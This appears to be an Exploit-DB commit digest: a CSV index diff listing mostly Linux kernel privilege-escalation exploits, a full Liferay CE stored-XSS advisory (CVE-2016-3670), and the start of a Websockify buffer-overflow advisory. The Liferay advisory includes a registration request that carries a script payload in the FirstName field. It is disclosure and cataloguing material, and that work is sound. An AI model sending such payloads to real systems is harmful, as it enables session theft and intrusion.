DB: 2016-06-03

4 new exploits

Linux Kernel 2.4 / 2.6 x86-64 - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit

Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1)  - SCTP FWD Memory Corruption Remote Exploit
Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit

Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10) (x86-64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6) - (32-bit) ip_append_data() ring0 Root Exploit
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit
Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (x86_64) (Redhat) - compat Local Root Exploit
Linux Kernel < 2.6.36-rc4-git2 (x86_64) - ia32syscall Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - compat Local Root Exploit

Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 11.10) - Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)

Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) (Gentoo / Ubuntu) - Mempodipper Local Root (1)
Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1)

Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86-64) - sock_diag_handlers[] Local Root
Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root

Linux Kernel <= 3.7.10 (Ubuntu 12.10) (64-Bit) - sock_diag_handlers Local Root Exploit
Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit

Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit
Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit

Linux Kernel <= 3.7.6  (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation
Linux Kernel <= 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation

Systrace 1.x (64-Bit) - Aware Linux Kernel Privilege Escalation Vulnerability
Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation Vulnerability

Linux Kernel 2.6.x - (64 bit) Personality Handling Local Denial of Service Vulnerability
Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service Vulnerability

Linux Kernel < 3.2.0-23  (Ubuntu 12.04) - ptrace/sysret Local Privilege Escalation
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - ptrace/sysret Local Privilege Escalation

Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (2)
Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2)
Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities
Liferay CE < 6.2 CE GA6 - Stored XSS
Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload
Websockify (C Implementation) 0.8.0 - Buffer Overflow

files.csv

@@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability",2007-09-26,"Khashayar Fereidani",php,webapps,0
 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability",2007-09-26,ka0x,asp,webapps,0
 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability",2007-09-26,Luna-Tic/XTErner,php,webapps,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86-64 - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerability",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 (repertoire) Remote File Inclusion Vulnerability",2007-09-27,0in,php,webapps,0
 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion Vulnerability",2007-09-27,"Mehmet Ince",php,webapps,0
@@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port
 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0
 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80
 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure Vulnerability",2009-04-27,SirGod,php,webapps,0
-8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1)  - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
+8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0
 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0
 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0
@@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection Vulnerability",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
-9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10) (x86-64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
+9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0
@@ -9004,7 +9004,7 @@ id,file,description,date,author,platform,type,port
 9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
 9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
-9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6) - (32-bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
+9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
@@ -13092,8 +13092,8 @@ id,file,description,date,author,platform,type,port
 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
-15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
-15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (x86_64) (Redhat) - compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
+15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
+15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0
 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
 15027,platforms/windows/dos/15027.py,"Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
@@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
 15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
-15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 11.10) - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
+15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
@@ -15950,7 +15950,7 @@ id,file,description,date,author,platform,type,port
 18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0
 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0
 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0
-18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) (Gentoo / Ubuntu) - Mempodipper Local Root (1)",2012-01-23,zx2c4,linux,local,0
+18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1)",2012-01-23,zx2c4,linux,local,0
 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0
 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0
 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0
@@ -21711,7 +21711,7 @@ id,file,description,date,author,platform,type,port
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
-24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86-64) - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
 24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
@@ -21900,7 +21900,7 @@ id,file,description,date,author,platform,type,port
 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
-24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10) (64-Bit) - sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
+24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
 24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
@@ -23272,7 +23272,7 @@ id,file,description,date,author,platform,type,port
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@@ -24416,7 +24416,7 @@ id,file,description,date,author,platform,type,port
 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443
 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,metasploit,unix,remote,7443
 27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0
-27297,platforms/lin_amd64/local/27297.c,"Linux Kernel <= 3.7.6  (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
+27297,platforms/lin_amd64/local/27297.c,"Linux Kernel <= 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.php SQL Injection Vulnerability",2006-02-23,ReZEN,php,webapps,0
 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0
 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0
@@ -29515,7 +29515,7 @@ id,file,description,date,author,platform,type,port
 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting Vulnerability",2009-01-23,arashps0,asp,webapps,0
 32749,platforms/linux/dos/32749.txt,"Pidgin <= 2.4.2 - 'msn_slplink_process_msg()' Denial of Service Vulnerability",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross-Site Scripting Vulnerability",2009-01-23,arash.setayeshi,asp,webapps,0
-32751,platforms/linux/local/32751.c,"Systrace 1.x (64-Bit) - Aware Linux Kernel Privilege Escalation Vulnerability",2009-01-23,"Chris Evans",linux,local,0
+32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation Vulnerability",2009-01-23,"Chris Evans",linux,local,0
 32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,metasploit,windows,local,0
 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,metasploit,hardware,remote,0
 32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0
@@ -30271,7 +30271,7 @@ id,file,description,date,author,platform,type,port
 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 - 'servercert' Parameter Cross-Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0
 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross-Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0
 33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability",2010-01-27,Intevydis,linux,dos,0
-33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x - (64 bit) Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
+33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
@@ -30759,7 +30759,7 @@ id,file,description,date,author,platform,type,port
 34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
-34134,platforms/lin_amd64/local/34134.c,"Linux Kernel < 3.2.0-23  (Ubuntu 12.04) - ptrace/sysret Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
+34134,platforms/lin_amd64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - ptrace/sysret Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
 34161,platforms/php/webapps/34161.txt,"WordPress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
 34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure Vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0
@@ -31675,7 +31675,7 @@ id,file,description,date,author,platform,type,port
 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
 35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0
 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0
-35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (2)",2012-01-12,zx2c4,linux,local,0
+35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2)",2012-01-12,zx2c4,linux,local,0
 35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
 35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
@@ -36059,3 +36059,7 @@ id,file,description,date,author,platform,type,port
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
+39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
+39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
+39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
+39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0

platforms/jsp/webapps/39880.txt

@@ -0,0 +1,64 @@
+CVE-2016-3670 Stored Cross Site Scripting in Liferay CE
+
+1. Vulnerability Properties
+
+Title: Stored Cross-Site Scripting Liferay CE
+CVE ID: CVE-2016-3670
+CVSSv3 Base Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
+Vendor: Liferay Inc
+Products: Liferay
+Advisory Release Date: 27 May 2016
+Advisory URL: https://labs.integrity.pt/advisories/cve-2016-3670
+Credits: Discovery by Fernando Câmara <fbc[at]integrity.pt>
+
+2. Vulnerability Summary
+
+Liferay is vulnerable to a stored XSS when an user is created with an
+malicious payload on the FirstName field.
+The javascript payload is executed when another user tries to use the
+profile search section.
+3. Technical Details
+
+An XSS vulnerability was found on the Profile Search functionality,
+accessible through User -> My Profile -> Search.  An attacker can set a
+malicious javascript payload on his  First Name affecting anyone who
+performs a search using a keyword present on his profile.
+
+The exploitation of this vulnerability could lead to an effective way to
+grab cookies (stealing sessions) from anyone that uses that search
+component.
+
+Exploitation Request: (User Registration with an malicious FirstName field)
+
+POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=1&p_p_state=
+maximized&p_p_mode=view&_58_struts_action=%2Flogin%2Fcreate_account
+
+Data:
+
+_58_firstName=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2
+
+The vulnerability is located on the users.jsp and as shown below the origin
+is the lack of validation of user input:
+
+line 64: <a data-value=”<%= curUserName %>” href=”javascript:;”>
+
+4. Vulnerable Versions
+
+< 6.2 CE GA6
+
+5. Solution
+
+Update to version 7.0.0 CE RC1
+
+6. Vulnerability Timeline
+
+    21/Jan/16 - Bug reported to Liferay
+    22/Mar/16 – Bug verified by vendor
+    22/Mar/16 – Bug fixed by vendor
+    27/May/16 – Advisory released
+
+
+7. References
+
+    https://issues.liferay.com/browse/LPS-62387
+    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3670

platforms/linux/local/32751.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/33417/info
 
 Systrace is prone to a local privilege-escalation vulnerability.
@@ -5,6 +6,7 @@ Systrace is prone to a local privilege-escalation vulnerability.
 A local attacker may be able to exploit this issue to bypass access control restrictions and make unintended system calls, which may result in an elevation of privileges.
 
 Versions prior to Systrace 1.6f are vulnerable.
+*/
 
 int
 main(int argc, const char* argv[])

platforms/linux/local/37937.c

@@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/55855/info
 
 The Linux kernel is prone to a local information-disclosure vulnerability.
 
 Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
+*/
 
 /* Test for UNAME26 personality uname kernel stack leak.
  * Copyright 2012, Kees Cook <keescook@chromium.org>

platforms/multiple/dos/39882.txt

@@ -0,0 +1,149 @@
+Advisory: Websockify: Remote Code Execution via Buffer Overflow
+
+RedTeam Pentesting discovered a buffer overflow vulnerability in the C
+implementation of Websockify, which allows attackers to execute
+arbitrary code.
+
+
+Details
+=======
+
+Product: Websockify C implementation
+Affected Versions: all versions <= 0.8.0
+Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
+Vulnerability Type: Buffer Overflow
+Security Risk: high
+Vendor URL: https://github.com/kanaka/websockify
+Vendor Status: fixed
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
